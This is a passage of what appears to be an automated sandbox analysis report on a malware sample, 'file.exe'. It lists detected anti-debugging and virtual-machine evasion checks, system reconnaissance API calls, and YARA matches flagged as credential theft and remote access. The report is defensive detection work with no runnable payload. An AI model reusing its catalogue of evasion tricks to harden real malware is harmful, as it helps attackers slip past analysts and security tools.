Source: file.exe, 00000000.00000002.2182986141.0000000001915000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2182986141.00000000018D2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2182986141.000000000188E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AF45C0 VirtualProtect ?,00000004,00000100,00000000 0_2_00AF45C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B09860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00B09860
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B09750 mov eax, dword ptr fs:[00000030h] 0_2_00B09750
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B078E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA, 0_2_00B078E0
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Yara match File source: Process Memory Space: file.exe PID: 3884, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B09600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00B09600
Source: file.exe Binary or memory string: [Program Manager
Source: file.exe, 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: [Program Manager
Source: C:\Users\user\Desktop\file.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00B07B90
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B07980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA, 0_2_00B07980
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B07850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_00B07850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B07A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 0_2_00B07A30

Stealing of Sensitive Information

barindex
Source: Yara match File source: 0.2.file.exe.af0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.2140370390.0000000005480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2182986141.000000000188E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 3884, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP

Remote Access Functionality

barindex
Source: Yara match File source: 0.2.file.exe.af0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.2140370390.0000000005480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2182986141.000000000188E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 3884, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs